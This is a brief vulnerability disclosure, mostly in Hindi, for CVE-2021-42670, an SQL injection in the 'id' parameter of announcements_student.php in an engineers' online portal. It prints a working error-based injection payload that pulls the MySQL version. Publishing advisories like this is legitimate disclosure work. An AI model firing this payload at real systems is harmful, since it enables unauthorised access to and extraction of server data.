
CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system.
CVE-2021-42670 - इंजीनियर्स ऑनलाइन पोर्टल सिस्टम में SQL इंजेक्शन भेद्यता।
इंजीनियर्स ऑनलाइन पोर्टल में एक SQL इंजेक्शन भेद्यता मौजूद है। एक हमलावर "announcements_student.php" वेब पेज में मौजूद कमजोर "id" पैरामीटर का लाभ उठाकर किए गए SQL क्वेरी में हेरफेर कर सकता है। परिणामस्वरूप, हमलावर वेब सर्वर से संवेदनशील डेटा निकाल सकता है।
प्रभावित घटक -
भेद्य पृष्ठ - announcements_student.php
भेद्य पैरामीटर - "id"
निम्नलिखित पेलोड आपको वेब सर्वर पर चलने वाले MySql सर्वर संस्करण को निकालने की अनुमति देगा -
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670
https://nvd.nist.gov/vuln/detail/CVE-2021-42670
Alon Leviev(0xDeku), 22 अक्टूबर, 2021.